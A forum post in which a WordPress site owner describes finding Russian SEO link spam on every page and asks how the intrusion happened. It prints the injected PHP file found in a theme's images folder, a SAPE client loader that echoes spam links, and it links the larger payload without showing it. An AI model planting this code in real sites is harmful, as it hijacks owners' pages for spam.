Injection from Russian SEO Spam hack

Hello, not sure if this is the right area, but it was the most relevant I could find. I came into work today(Monday March 14) and I noticed our WP site now has footer spam. So after I finished freaking out about what it could be, I did a few malware scans and found that our site had been injected with some Russian ad blackhat SEO spam on every page.

I first downloaded Anti-Malware Security and Brute-Force Firewall and did a complete site scan, which returned multiple malware errors, all leading to a page inside my theme.

It was injected into my theme/images folder in a file named settings.php

The following code is what was in that file

<?php 

     if (!defined('_SAPE_USER')){

        define('_SAPE_USER', 'bf0d084e633a405399aaf7acc1878e5c'); 

     }

     require_once($_SERVER['DOCUMENT_ROOT'].'/wp-content/themes/THEMENAMEREMOVED/images/cache/'._SAPE_USER.'/cache.php'); 

    $o[ 'force_show_code' ] = true;

    //Добавье эту строку для вывода красной надписи

    $o[ 'verbose' ] = true;

$o['charset'] = 'UTF-8';

    $sape = new SAPE_client( $o );

    echo $sape->return_links();

?>

The php page in the require_once is cache.php – which is too long to post here so I posted it in two parts on pastie.org
Part 1
Part 2

So I removed that code, did another scan which came up clean. I also continued to read up and am currently trying out Wordfence for security maintenance.

My only concern is how they injected this in the first place. If anyone has any tips or ideas, please reply. I tried to find a centralized area for WP security based items, but could not find one, if you know of one, please link it here.